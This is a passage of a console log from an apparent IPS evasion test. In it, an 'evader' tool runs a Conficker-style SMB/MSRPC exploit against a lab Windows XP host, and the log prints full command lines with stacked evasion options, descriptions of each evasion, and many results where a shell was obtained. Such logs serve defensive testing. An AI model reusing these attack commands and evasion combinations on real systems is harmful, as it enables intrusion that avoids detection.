  5656. 9481 runs averaging 1.90 runs / second ; progress: 5003/43200.........
  5657. 9490 runs averaging 1.90 runs / second ; progress: 5008/43200......
  5658. 9496 runs averaging 1.89 runs / second ; progress: 5013/43200Pid 13487 timed out - killed
  5659. 2015-06-08 00:43:03 INFO
  5660. Timed out (10.62.90.113):
  5661. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.113 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=39306 --extra=bindport=10003 --verifydelay=200 --obfuscate --randseed=Q0zugvYbYYA --evasion=[smb_opentree,smb_openpipe]tcp_tsoptreply,"le" --evasion=[smb_opentree,msrpc_req]tcp_urgent,"2","random" --verifydelay=1000 --payload=shell
  5662. Info: Using random seed Q0zugvYbYYB
  5663. The following evasions are applied from stage smb_opentree to smb_openpipe:
  5664. - TCP timestamps echo reply value is sent in the wrong endianness
  5665. The following evasions are applied from stage smb_opentree to msrpc_req:
  5666. - Add a random urgent data byte to every 2 TCP segment.
  5667.  
  5668. Info: NetBIOS connection 10.62.90.113:39306 -> 10.35.1.207:445
  5669. Terminated
  5670. .....
  5671. 9502 runs averaging 1.89 runs / second ; progress: 5018/43200....
  5672. 9506 runs averaging 1.89 runs / second ; progress: 5023/43200...........2015-06-08 00:43:17 INFO
  5673. Success. (10.62.90.113):
  5674. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.113 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=17032 --extra=bindport=10003 --verifydelay=200 --obfuscate --randseed=rkDra41C6CA --evasion=[smb_connect,smb_opentree]ipv4_frag,"64" --evasion=[msrpc_bind,msrpc_req]ipv4_opt,"25%","inc","alphanumrandomized" --evasion=[smb_opentree,end]tcp_paws,"1","4","random" --verifydelay=1000 --payload=shell
  5675. Info: Using random seed rkDra41C6CC
  5676. The following evasions are applied from stage smb_connect to smb_opentree:
  5677. - IPv4 fragments with at most 64 bytes per fragment
  5678. The following evasions are applied from stage smb_opentree to end:
  5679. - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 4> and has random bytes as payload
  5680. The following evasions are applied from stage msrpc_bind to msrpc_req:
  5681. - 25% probability to send a duplicate IPv4 packet with an incrementing DWORD in the options field.
  5682. The duplicate packet has identical payload except that alphanumeric characters are randomized
  5683.  
  5684. Info: NetBIOS connection 10.62.90.113:17032 -> 10.35.1.207:445
  5685. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  5686. Info: Sending MSRPC request with exploit
  5687. Info: Shell found, attack succeeded
  5688. Info: Shell closed
  5689. 0: Success.
  5690. ..
  5691. 9520 runs averaging 1.89 runs / second ; progress: 5028/43200.......
  5692. 9527 runs averaging 1.89 runs / second ; progress: 5033/43200......
  5693. 9533 runs averaging 1.89 runs / second ; progress: 5038/43200.Pid 13797 timed out - killed
  5694. 2015-06-08 00:43:28 INFO
  5695. Timed out (10.62.90.114):
  5696. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.114 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=45463 --extra=bindport=10004 --verifydelay=200 --obfuscate --randseed=BmVQm+XD3os --evasion=[msrpc_req,end]tcp_tsoptreply,"le" --evasion=[smb_openpipe,end]tcp_urgent,"75%","zero" --verifydelay=1000 --payload=shell
  5697. Info: Using random seed BmVQm+XD3os
  5698. The following evasions are applied from stage smb_openpipe to end:
  5699. - 75% probability to add a zero urgent data byte to a TCP segment.
  5700. The following evasions are applied from stage msrpc_req to end:
  5701. - TCP timestamps echo reply value is sent in the wrong endianness
  5702.  
  5703. Info: NetBIOS connection 10.62.90.114:45463 -> 10.35.1.207:445
  5704. Terminated
  5705. .........
  5706. 9544 runs averaging 1.89 runs / second ; progress: 5043/43200..........
  5707. 9554 runs averaging 1.89 runs / second ; progress: 5048/43200......
  5708. 9560 runs averaging 1.89 runs / second ; progress: 5053/43200
  5709. 9560 runs averaging 1.89 runs / second ; progress: 5058/43200...
  5710. 9563 runs averaging 1.89 runs / second ; progress: 5063/43200.......
  5711. 9570 runs averaging 1.89 runs / second ; progress: 5068/43200........
  5712. 9578 runs averaging 1.89 runs / second ; progress: 5073/43200...
  5713. 9581 runs averaging 1.89 runs / second ; progress: 5078/43200....
  5714. 9585 runs averaging 1.89 runs / second ; progress: 5083/43200..........
  5715. 9595 runs averaging 1.89 runs / second ; progress: 5088/43200...2015-06-08 00:44:19 INFO
  5716. Success. (10.62.90.113):
  5717. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.113 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=51195 --extra=bindport=10003 --verifydelay=200 --obfuscate --randseed=WX0LabE5SUM --evasion=[smb_connect,msrpc_bind]netbios_chaff,"21","empty_unspec|empty_keepalive|small_unspec|http_post|broken_length" --evasion=[smb_opentree,msrpc_req]smb_decoytrees,"6","6","7","random_msrpcbind" --verifydelay=1000 --payload=shell
  5718. Info: Using random seed WX0LabE5SUN
  5719. The following evasions are applied from stage smb_connect to msrpc_bind:
  5720. - Before every 21th actual NetBIOS message a chaff message is sent. The chaff message is an empty NetBIOS message of unspecified type. The chaff message is an empty NetBIOS Keep-Alive message. The chaff message is a small NetBIOS message of an unspecified type. The chaff message is an unspecified NetBIOS message with HTTP POST request like payload. The chaff message is an unspecified NetBIOS message with a small payload and an invalid length value.
  5721. The following evasions are applied from stage smb_opentree to msrpc_req:
  5722. - Before normal SMB writes, 6 SMB trees are opened and 6 writes are performed to them. The write payload is 7 bytes of MSRPC bind-like data.
  5723.  
  5724. Info: NetBIOS connection 10.62.90.113:51195 -> 10.35.1.207:445
  5725. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  5726. Info: Sending MSRPC request with exploit
  5727. Info: Shell found, attack succeeded
  5728. Info: Shell closed
  5729. 0: Success.
  5730. ........
  5731. 9607 runs averaging 1.89 runs / second ; progress: 5093/43200.Pid 14503 timed out - killed
  5732. 2015-06-08 00:44:24 INFO
  5733. Timed out (10.62.90.110):
  5734. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.110 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=24836 --extra=bindport=10000 --verifydelay=200 --obfuscate --randseed=crQp6CU8s8g --evasion=[netbios_connect,msrpc_bind]ipv4_frag,"64" --evasion=[smb_openpipe,end]tcp_urgent,"1","random_alpha" --verifydelay=1000 --payload=shell
  5735. Info: Using random seed crQp6CU8s8h
  5736. The following evasions are applied from stage netbios_connect to msrpc_bind:
  5737. - IPv4 fragments with at most 64 bytes per fragment
  5738. The following evasions are applied from stage smb_openpipe to end:
  5739. - Add a random alphaurgent data byte to every 1 TCP segment.
  5740.  
  5741. Info: NetBIOS connection 10.62.90.110:24836 -> 10.35.1.207:445
  5742. Terminated
  5743. .....
  5744. 9614 runs averaging 1.89 runs / second ; progress: 5098/43200......
  5745. 9620 runs averaging 1.89 runs / second ; progress: 5103/43200.........
  5746. 9629 runs averaging 1.89 runs / second ; progress: 5108/43200..........
  5747. 9639 runs averaging 1.89 runs / second ; progress: 5113/43200.........
  5748. 9648 runs averaging 1.89 runs / second ; progress: 5118/43200.......
  5749. 9655 runs averaging 1.88 runs / second ; progress: 5123/43200.....
  5750. 9660 runs averaging 1.88 runs / second ; progress: 5128/43200.........
  5751. 9669 runs averaging 1.88 runs / second ; progress: 5133/43200.....
  5752. 9674 runs averaging 1.88 runs / second ; progress: 5138/43200.....
  5753. 9679 runs averaging 1.88 runs / second ; progress: 5143/43200...........
  5754. 9690 runs averaging 1.88 runs / second ; progress: 5148/43200...........
  5755. 9701 runs averaging 1.88 runs / second ; progress: 5153/43200...2015-06-08 00:45:25 INFO
  5756. Success. (10.62.90.114):
  5757. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.114 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=35341 --extra=bindport=10004 --verifydelay=200 --obfuscate --randseed=ggSUJv4b+PQ --evasion=[smb_openpipe,end]smb_writeandxpad,"6","random" --evasion=[start,end]tcp_paws,"50%","187349922","random" --verifydelay=1000 --payload=shell
  5758. Info: Using random seed ggSUJv4b+PS
  5759. - 50% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 187349922> and has random bytes as payload
  5760. The following evasions are applied from stage smb_openpipe to end:
  5761. - 6 bytes of padding is inserted into WriteAndX messages between the SMB header and payload. The padding consists of random bytes.
  5762.  
  5763. Info: NetBIOS connection 10.62.90.114:35341 -> 10.35.1.207:445
  5764. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  5765. Info: Sending MSRPC request with exploit
  5766. Info: Shell found, attack succeeded
  5767. Info: Command shell connection reset.
  5768. Info: CommandShell::SendCommand() - Failed to send string
  5769. Info: Shell closed
  5770. 0: Success.
  5771. 2015-06-08 00:45:25 INFO
  5772. Success. (10.62.90.110):
  5773. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.110 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=58158 --extra=bindport=10000 --verifydelay=200 --obfuscate --randseed=xTjXRzVMytY --evasion=[smb_opentree,end]tcp_paws,"5","9","shuffle" --evasion=[smb_openpipe,end]tcp_tsoptreply,"le" --verifydelay=1000 --payload=shell
  5774. Info: Using random seed xTjXRzVMytb
  5775. The following evasions are applied from stage smb_opentree to end:
  5776. - Every 5th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 9> and has shuffled original payload
  5777. The following evasions are applied from stage smb_openpipe to end:
  5778. - TCP timestamps echo reply value is sent in the wrong endianness
  5779.  
  5780. Info: NetBIOS connection 10.62.90.110:58158 -> 10.35.1.207:445
  5781. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  5782. Info: Sending MSRPC request with exploit
  5783. Info: Shell found, attack succeeded
  5784. Info: Shell closed
  5785. 0: Success.
  5786. ....
  5787. 9710 runs averaging 1.88 runs / second ; progress: 5158/43200......
  5788. 9716 runs averaging 1.88 runs / second ; progress: 5163/43200.....
  5789. 9721 runs averaging 1.88 runs / second ; progress: 5168/43200..
  5790. 9723 runs averaging 1.88 runs / second ; progress: 5173/43200Pid 15235 timed out - killed
  5791. 2015-06-08 00:45:43 INFO
  5792. Timed out (10.62.90.111):
  5793. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.111 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=62990 --extra=bindport=10001 --verifydelay=200 --obfuscate --randseed=F8rOXONBWIg --evasion=[smb_opentree,smb_openpipe]smb_decoytrees,"3","5","90","random" --evasion=[smb_openpipe,msrpc_bind]tcp_urgent,"50%","random_alpha" --verifydelay=1000 --payload=shell
  5794. Info: Using random seed F8rOXONBWIg
  5795. The following evasions are applied from stage smb_opentree to smb_openpipe:
  5796. - Before normal SMB writes, 3 SMB trees are opened and 5 writes are performed to them. The write payload is 90 random bytes.
  5797. The following evasions are applied from stage smb_openpipe to msrpc_bind:
  5798. - 50% probability to add a random alphaurgent data byte to a TCP segment.
  5799.  
  5800. Info: NetBIOS connection 10.62.90.111:62990 -> 10.35.1.207:445
  5801. Terminated
  5802. ............
  5803. 9736 runs averaging 1.88 runs / second ; progress: 5178/43200......
  5804. 9742 runs averaging 1.88 runs / second ; progress: 5183/43200
  5805. 9742 runs averaging 1.88 runs / second ; progress: 5188/43200
  5806. 9742 runs averaging 1.88 runs / second ; progress: 5193/43200....
  5807. 9746 runs averaging 1.87 runs / second ; progress: 5198/43200..
  5808. 9748 runs averaging 1.87 runs / second ; progress: 5203/43200
  5809. 9748 runs averaging 1.87 runs / second ; progress: 5208/43200..
  5810. 9750 runs averaging 1.87 runs / second ; progress: 5213/43200.....
  5811. 9755 runs averaging 1.87 runs / second ; progress: 5218/43200.....
  5812. 9760 runs averaging 1.87 runs / second ; progress: 5223/43200......
  5813. 9766 runs averaging 1.87 runs / second ; progress: 5228/43200Pid 16139 timed out - killed
  5814. 2015-06-08 00:46:38 INFO
  5815. Timed out (10.62.90.119):
  5816. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.119 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=18534 --extra=bindport=10009 --verifydelay=200 --obfuscate --randseed=UWQTgxLgPHQ --evasion=[start,end]tcp_chaff,"13","nullchksum|outofwindow","alphanumrandomized" --evasion=[smb_openpipe,msrpc_bind]tcp_urgent,"1","random" --evasion=[smb_openpipe,end]tcp_urgent,"25%","random_alpha" --verifydelay=1000 --payload=shell
  5817. Info: Using random seed UWQTgxLgPHR
  5818. - With every 13 TCP packet a TCP chaff packet is sent. The chaff packet has:
  5819. * NULL TCP checksum.
  5820. * An out-of-window sequence number.
  5821. * Duplicate packet has original payload with alphanumeric bytes randomized
  5822. The following evasions are applied from stage smb_openpipe to msrpc_bind:
  5823. - Add a random urgent data byte to every 1 TCP segment.
  5824. The following evasions are applied from stage smb_openpipe to end:
  5825. - 25% probability to add a random alphaurgent data byte to a TCP segment.
  5826.  
  5827. Info: NetBIOS connection 10.62.90.119:18534 -> 10.35.1.207:445
  5828. Terminated
  5829. .2015-06-08 00:46:39 INFO
  5830. Success. (10.62.90.114):
  5831. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.114 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=61513 --extra=bindport=10004 --verifydelay=200 --obfuscate --randseed=5kiMdDy3TFI --evasion=[smb_connect,msrpc_req]smb_writeandxpad,"2","zero" --evasion=[msrpc_bind,end]tcp_paws,"3","5","alphanumrandomized" --verifydelay=1000 --payload=shell
  5832. Info: Using random seed 5kiMdDy3TFL
  5833. The following evasions are applied from stage smb_connect to msrpc_req:
  5834. - 2 bytes of padding is inserted into WriteAndX messages between the SMB header and payload. The padding consists of zero bytes.
  5835. The following evasions are applied from stage msrpc_bind to end:
  5836. - Every 3th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 5> and has original payload with alphanumeric bytes randomized
  5837.  
  5838. Info: NetBIOS connection 10.62.90.114:61513 -> 10.35.1.207:445
  5839. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  5840. Info: Sending MSRPC request with exploit
  5841. Info: Shell found, attack succeeded
  5842. Info: Shell closed
  5843. 0: Success.
  5844. ...............
  5845. 9784 runs averaging 1.87 runs / second ; progress: 5233/43200..............
  5846. 9798 runs averaging 1.87 runs / second ; progress: 5238/43200...........2015-06-08 00:46:52 INFO
  5847. Success. (10.62.90.111):
  5848. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.111 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=11372 --extra=bindport=10001 --verifydelay=200 --obfuscate --randseed=lnUUcWzYjN4 --evasion=[start,msrpc_req]tcp_chaff,"25%","nullchksum|nullflag","random_alpha" --evasion=[start,msrpc_req]tcp_paws,"75%","144672393","alphanumrandomized" --verifydelay=1000 --payload=shell
  5849. Info: Using random seed lnUUcWzYjN6
  5850. The following evasions are applied from stage start to msrpc_req:
  5851. - 25% probability to send TCP chaff when sending a TCP packet. The chaff packet has:
  5852. * NULL TCP checksum.
  5853. * NULL TCP control flags.
  5854. * Duplicate packet has random alpha bytes as payload
  5855. - 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 144672393> and has original payload with alphanumeric bytes randomized
  5856.  
  5857. Info: NetBIOS connection 10.62.90.111:11372 -> 10.35.1.207:445
  5858. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  5859. Info: Sending MSRPC request with exploit
  5860. Info: Shell found, attack succeeded
  5861. Info: CommandShell::SendCommand() - Failed to send string
  5862. Info: Command shell connection reset.
  5863. Info: Shell closed
  5864. 0: Success.
  5865. .
  5866. 9811 runs averaging 1.87 runs / second ; progress: 5243/43200............
  5867. 9823 runs averaging 1.87 runs / second ; progress: 5248/43200.......
  5868. 9830 runs averaging 1.87 runs / second ; progress: 5253/43200.....
  5869. 9835 runs averaging 1.87 runs / second ; progress: 5258/43200..Pid 16829 timed out - killed
  5870. 2015-06-08 00:47:11 INFO
  5871. Timed out (10.62.90.118):
  5872. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.118 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=31195 --extra=bindport=10008 --verifydelay=200 --obfuscate --randseed=g3i822C4j6o --evasion=[smb_opentree,smb_openpipe]smb_decoytrees,"7","7","1","random_msrpcbind" --evasion=[smb_opentree,msrpc_bind]tcp_chaff,"50%","longhdr","zero" --evasion=[smb_opentree,msrpc_bind]tcp_urgent,"2","random_alpha" --verifydelay=1000 --payload=shell
  5873. Info: Using random seed g3i822C4j6q
  5874. The following evasions are applied from stage smb_opentree to msrpc_bind:
  5875. - 50% probability to send TCP chaff when sending a TCP packet. The chaff packet has:
  5876. * TCP header longer than packet total size
  5877. * Duplicate packet has 0x00 bytes as payload
  5878. - Add a random alphaurgent data byte to every 2 TCP segment.
  5879. The following evasions are applied from stage smb_opentree to smb_openpipe:
  5880. - Before normal SMB writes, 7 SMB trees are opened and 7 writes are performed to them. The write payload is 1 bytes of MSRPC bind-like data.
  5881.  
  5882. Info: NetBIOS connection 10.62.90.118:31195 -> 10.35.1.207:445
  5883. Terminated
  5884. ......
  5885. 9844 runs averaging 1.87 runs / second ; progress: 5263/43200.
  5886. 9845 runs averaging 1.87 runs / second ; progress: 5268/43200
  5887. 9845 runs averaging 1.87 runs / second ; progress: 5273/43200....
  5888. 9849 runs averaging 1.87 runs / second ; progress: 5278/43200..........
  5889. 9859 runs averaging 1.87 runs / second ; progress: 5283/43200.2015-06-08 00:47:34 INFO
  5890. Success. (10.62.90.118):
  5891. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.118 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=49009 --extra=bindport=10008 --verifydelay=200 --obfuscate --randseed=pAFHX3UuQoc --evasion=[msrpc_bind,end]msrpc_ndrflag,"char_ebcdic","float_cray","byte3_nonzero","byte4_nonzero" --evasion=[msrpc_bind,end]tcp_paws,"1","3","random_alpha" --verifydelay=1000 --payload=shell
  5892. Info: Using random seed pAFHX3UuQoe
  5893. The following evasions are applied from stage msrpc_bind to end:
  5894. - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 3> and has random alpha bytes as payload
  5895. - MSRPC NDR flag is modified:
  5896. * EBCDIC character encoding
  5897. * Cray floating point value encoding
  5898. * Reserved 3rd byte is set to a random non-zero value
  5899. * Reserved 4th byte is set to a random non-zero value
  5900.  
  5901.  
  5902. Info: NetBIOS connection 10.62.90.118:49009 -> 10.35.1.207:445
  5903. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  5904. Info: Sending MSRPC request with exploit
  5905. Info: Shell found, attack succeeded
  5906. Info: Shell closed
  5907. 0: Success.
  5908. ..Pid 17242 timed out - killed
  5909. 2015-06-08 00:47:36 INFO
  5910. Timed out (10.62.90.112):
  5911. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.112 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=37714 --extra=bindport=10002 --verifydelay=200 --obfuscate --randseed=zMj0U5a/Pp0 --evasion=[smb_opentree,msrpc_bind]tcp_urgent,"50%","random_alphanum" --evasion=[smb_opentree,end]tcp_urgent,"13","random_alphanum" --verifydelay=1000 --payload=shell
  5912. Info: Using random seed zMj0U5a/Pp3
  5913. The following evasions are applied from stage smb_opentree to msrpc_bind:
  5914. - 50% probability to add a random alphanumeric urgent data byte to a TCP segment.
  5915. The following evasions are applied from stage smb_opentree to end:
  5916. - Add a random alphanumeric urgent data byte to every 13 TCP segment.
  5917.  
  5918. Info: NetBIOS connection 10.62.90.112:37714 -> 10.35.1.207:445
  5919. Terminated
  5920. .....
  5921. 9869 runs averaging 1.87 runs / second ; progress: 5288/43200........
  5922. 9877 runs averaging 1.87 runs / second ; progress: 5293/43200.
  5923. 9878 runs averaging 1.86 runs / second ; progress: 5298/43200
  5924. 9878 runs averaging 1.86 runs / second ; progress: 5303/43200Pid 17425 timed out - killed
  5925. 2015-06-08 00:47:55 INFO
  5926. Timed out (10.62.90.115):
  5927. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.115 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=46226 --extra=bindport=10005 --verifydelay=200 --obfuscate --randseed=phYQAl9P9Ek --evasion=[smb_openpipe,msrpc_bind]netbios_chaff,"5","empty_unspec|empty_keepalive|http_post|msrpc_req" --evasion=[smb_connect,msrpc_bind]tcp_urgent,"25%","zero" --verifydelay=1000 --payload=shell
  5928. Info: Using random seed phYQAl9P9Em
  5929. The following evasions are applied from stage smb_connect to msrpc_bind:
  5930. - 25% probability to add a zero urgent data byte to a TCP segment.
  5931. The following evasions are applied from stage smb_openpipe to msrpc_bind:
  5932. - Before every 5th actual NetBIOS message a chaff message is sent. The chaff message is an empty NetBIOS message of unspecified type. The chaff message is an empty NetBIOS Keep-Alive message. The chaff message is an unspecified NetBIOS message with HTTP POST request like payload. The chaff message is an unspecified NetBIOS message with MSRPC request like payload.
  5933.  
  5934. Info: NetBIOS connection 10.62.90.115:46226 -> 10.35.1.207:445
  5935. Terminated
  5936. ...........
  5937. 9890 runs averaging 1.86 runs / second ; progress: 5308/43200...........
  5938. 9901 runs averaging 1.86 runs / second ; progress: 5314/43200..2015-06-08 00:48:05 INFO
  5939. Success. (10.62.90.118):
  5940. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.118 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=51959 --extra=bindport=10008 --verifydelay=200 --obfuscate --randseed=+VYvQ2mQ8bE --evasion=[smb_connect,end]smb_chaff,"5","write_flag","alphanum" --evasion=[smb_connect,smb_opentree]smb_writeandxpad,"1022","random" --evasion=[smb_openpipe,end]tcp_paws,"75%","8","random" --verifydelay=1000 --payload=shell
  5941. Info: Using random seed +VYvQ2mQ8bH
  5942. The following evasions are applied from stage smb_connect to end:
  5943. - Before every 5th SMB message an SMB chaff message is sent. The chaff is a WriteAndX message with a broken write mode flag, and has random alphanumeric payload
  5944. The following evasions are applied from stage smb_connect to smb_opentree:
  5945. - 1022 bytes of padding is inserted into WriteAndX messages between the SMB header and payload. The padding consists of random bytes.
  5946. The following evasions are applied from stage smb_openpipe to end:
  5947. - 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 8> and has random bytes as payload
  5948.  
  5949. Info: NetBIOS connection 10.62.90.118:51959 -> 10.35.1.207:445
  5950. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  5951. Info: Sending MSRPC request with exploit
  5952. Info: Shell found, attack succeeded
  5953. Info: Shell closed
  5954. 0: Success.
  5955. ...
  5956. 9907 runs averaging 1.86 runs / second ; progress: 5319/43200.......
  5957. 9914 runs averaging 1.86 runs / second ; progress: 5324/43200..............
  5958. 9928 runs averaging 1.86 runs / second ; progress: 5329/43200.............
  5959. 9941 runs averaging 1.86 runs / second ; progress: 5334/43200....
  5960. 9945 runs averaging 1.86 runs / second ; progress: 5339/43200.Pid 17947 timed out - killed
  5961. 2015-06-08 00:48:29 INFO
  5962. Timed out (10.62.90.116):
  5963. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.116 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=19121 --extra=bindport=10006 --verifydelay=200 --obfuscate --randseed=DkgYBia6gZ4 --evasion=[smb_opentree,msrpc_req]smb_decoytrees,"5","2","10","random" --evasion=[smb_opentree,msrpc_bind]tcp_urgent,"5","zero" --evasion=[smb_opentree,end]tcp_urgent,"2","random_alphanum" --verifydelay=1000 --payload=shell
  5964. Info: Using random seed DkgYBia6gZ4
  5965. The following evasions are applied from stage smb_opentree to msrpc_bind:
  5966. - Add a zero urgent data byte to every 5 TCP segment.
  5967. The following evasions are applied from stage smb_opentree to end:
  5968. - Add a random alphanumeric urgent data byte to every 2 TCP segment.
  5969. The following evasions are applied from stage smb_opentree to msrpc_req:
  5970. - Before normal SMB writes, 5 SMB trees are opened and 2 writes are performed to them. The write payload is 10 random bytes.
  5971.  
  5972. Info: NetBIOS connection 10.62.90.116:19121 -> 10.35.1.207:445
  5973. Terminated
  5974. ........
  5975. 9955 runs averaging 1.86 runs / second ; progress: 5344/43200.....2015-06-08 00:48:36 INFO
  5976. Success. (10.62.90.112):
  5977. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.112 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=37931 --extra=bindport=10002 --verifydelay=200 --obfuscate --randseed=gb7yxSxJuLs --evasion=[netbios_connect,msrpc_req]tcp_paws,"1","240184953","alphanumrandomized" --evasion=[smb_opentree,msrpc_req]tcp_tsoptreply,"le" --verifydelay=1000 --payload=shell
  5978. Info: Using random seed gb7yxSxJuLu
  5979. The following evasions are applied from stage netbios_connect to msrpc_req:
  5980. - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 240184953> and has original payload with alphanumeric bytes randomized
  5981. The following evasions are applied from stage smb_opentree to msrpc_req:
  5982. - TCP timestamps echo reply value is sent in the wrong endianness
  5983.  
  5984. Info: NetBIOS connection 10.62.90.112:37931 -> 10.35.1.207:445
  5985. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  5986. Info: Sending MSRPC request with exploit
  5987. Info: Shell found, attack succeeded
  5988. Info: Shell closed
  5989. 0: Success.
  5990. ......
  5991. 9967 runs averaging 1.86 runs / second ; progress: 5349/43200.....2015-06-08 00:48:40 INFO
  5992. Success. (10.62.90.115):
  5993. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.115 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=57198 --extra=bindport=10005 --verifydelay=200 --obfuscate --randseed=gDU7yuN81Mg --evasion=[netbios_connect,smb_opentree]ipv4_opt,"2","inc","alphanumrandomized" --evasion=[msrpc_bind,msrpc_req]smb_fnameobf,"change_case|add_null_trailer" --evasion=[start,msrpc_req]tcp_paws,"1","268435453","random" --verifydelay=1000 --payload=shell
  5994. Info: Using random seed gDU7yuN81Mi
  5995. The following evasions are applied from stage start to msrpc_req:
  5996. - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435453> and has random bytes as payload
  5997. The following evasions are applied from stage netbios_connect to smb_opentree:
  5998. - Every 2th IPv4 packet is duplicated and an incrementing DWORD is added to the options field.
  5999. The duplicate packet has identical payload except that alphanumeric characters are randomized
  6000. The following evasions are applied from stage msrpc_bind to msrpc_req:
  6001. - The SMB filename is obfuscated:
  6002. * Random characters case is changed
  6003. * A 0x00 and random alphanumeric characters are appended to the filename
  6004.  
  6005. Info: NetBIOS connection 10.62.90.115:57198 -> 10.35.1.207:445
  6006. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  6007. Info: Sending MSRPC request with exploit
  6008. Info: Shell found, attack succeeded
  6009. Info: Shell closed
  6010. 0: Success.
  6011. ..2015-06-08 00:48:41 INFO
  6012. Success. (10.62.90.111):
  6013. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.111 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=57307 --extra=bindport=10001 --verifydelay=200 --obfuscate --randseed=qWTEmsEyMHI --evasion=[smb_opentree,msrpc_bind]smb_chaff,"25%","write_flag","zero" --evasion=[smb_connect,msrpc_req]tcp_paws,"5","7","alphanumrandomized" --verifydelay=1000 --payload=shell
  6014. Info: Using random seed qWTEmsEyMHK
  6015. The following evasions are applied from stage smb_connect to msrpc_req:
  6016. - Every 5th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 7> and has original payload with alphanumeric bytes randomized
  6017. The following evasions are applied from stage smb_opentree to msrpc_bind:
  6018. - 25% probability to send an SMB chaff message before real messages. The chaff is a WriteAndX message with a broken write mode flag, and has zeroes for payload
  6019.  
  6020. Info: NetBIOS connection 10.62.90.111:57307 -> 10.35.1.207:445
  6021. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  6022. Info: Sending MSRPC request with exploit
  6023. Info: Shell found, attack succeeded
  6024. Info: Shell closed
  6025. 0: Success.
  6026. .........
  6027. 9985 runs averaging 1.87 runs / second ; progress: 5354/43200..........2015-06-08 00:48:46 INFO
  6028. Success. (10.62.90.116):
